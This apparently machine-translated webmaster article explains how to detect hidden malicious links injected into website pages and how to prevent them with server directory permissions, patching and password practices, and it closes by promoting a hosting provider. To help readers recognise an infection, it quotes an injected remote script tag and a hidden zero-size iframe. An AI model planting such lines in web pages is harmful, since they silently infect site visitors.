A simple way to prevent a website from being hung by a bug

Intermediary transaction http://www.aliyun.com/zixun/aggregation/6858.html ">seo diagnose Taobao guest cloud host technology Hall

Believe that most webmasters have the site is hanging horse (is hanging virus) experience, especially with the Chinese Internet development of this batch of veteran webmaster, with the network popularization of the more in-depth, the more advanced hacker technology, the more exposed to the previous procedures loopholes. Now the new webmaster is more happy, the current popular website procedures have been mature, such as Shopex, dynamic, discuz, are very good procedures. Everyone as long as the timely upgrade to update the patch is not a big problem. But there are still customers to reflect the site opened the virus, I will explain the reasons for their patience and the treatment of the method, but found that we still lack of some website maintenance common sense. Here, I offer you some ideas.

First of all, open the Web page after the antivirus software alarm prompted a virus, up to 2 kinds of possible, your Web page was put into a virus link, one is the site of the server is the ARP virus, the equivalent of a horse to the machine, but this does not mean that the server was real intrusion, may be the computer room other machines in the ARP packet. Then you visit the page such as index.asp hint virus, through FTP login, download this file to your local computer, right-click the page with Notepad open, view the bottom of the page, if found <script language=javascript src= Http://aaabbcc.net/awlove/fuckk/love.jsd></script><iframe src=http://xxx.8888.com/newdm/ddd.htm Width=0 height=0></iframe> and other similar statements, it means that your site has been hacked, this is the virus code hanging. Delete after the save also removed the virus link, but can only cure root not cure. The intruder will still be able to keep you in. So what to do, and for what reason.

In fact, although there are so many good procedures, but there are still 2 kinds of situations, one is still using a few years ago, but not to find the network company produced, but a few years ago on the Internet, most of these procedures are flawed, especially the injection of loopholes in the previous few years, the code when the program is completely without a sense of prevention , but the site has been running for so long, there are a large number of important data, the site can not be said to replace the replacement, this mostly happened in the enterprise to do the corporate web site; the other is that the program patch update is not a long-term upgrade, hacker technology in progress, new loopholes will be found, So if the program service provider release patches to update or upgrade to the latest procedures, the other is not timely update may be hackers to use and hang the horse, but will inevitably appear can not be updated in time, and so very passive, the discovery of the loophole is always appear in the patch before.

So now we're going to use a simple way to solve these annoying viruses. Here we use the authority mechanism on the server to deal with, the server authority is the Web site program security of the last line of defense, but also the most effective, set a good once and for all. Set up the idea is to provide the upload of the directory to perform the right to remove, such as Access database directory data and Uploadface, uploadfiles, such as upload files stored directory; the directory to upload and file write permission to remove, such as index.asp, index.php such as Web files and Admin, Inc., include, and so do not need to upload files directory. So even if the Trojan is uploaded, can not be executed, even if there is control permissions, but did not write the Web page to the virus link code permissions. Seemingly simple setting, in fact endless. The use of related directories and files is explained in the package that you download. As long as we understand the charm of authority and the flexibility to master the setting method, the site security becomes simple. In the VPS or server build station can also use the same reason, let the authority for your site to build the most solid protection network.

We recommend that you pay attention to a few small common sense, for example, after downloading a lot of program administrator password is the default, you need to change it in time, password to be as long as possible, 10 digits and letter combination can be, the current 12-digit and 8-digit letter encrypted password has been cracked, so even if the database is downloaded, Can not get your management password; For example, background management password and FTP password do not record in their own computer, perhaps the day your computer will have a trojan, if there is a certain strength of the webmaster, on their own web site functions and database structure can do some adjustment, and the code to do some anti-injection processing; Web site code as far as possible to choose the process of online popular, such as doing shop with Shopex, Ecshop, do the forum with Discuz, Phpwind, do a comprehensive website with easy to do, do a forum with WordPress, Oblog, do content management system with DEDECMS, wind and so on, The use of high quality programs is half the success. Finally choose a professional service provider, only the professional and highly qualified service providers to the security of the server has absolute protection, and then register the domain name and then buy a stable high-speed space, which is to build the station to do a good job of the foundation. Huaxia Network has put the site security settings function into the host management system, I believe that we can provide a safe and stable host space.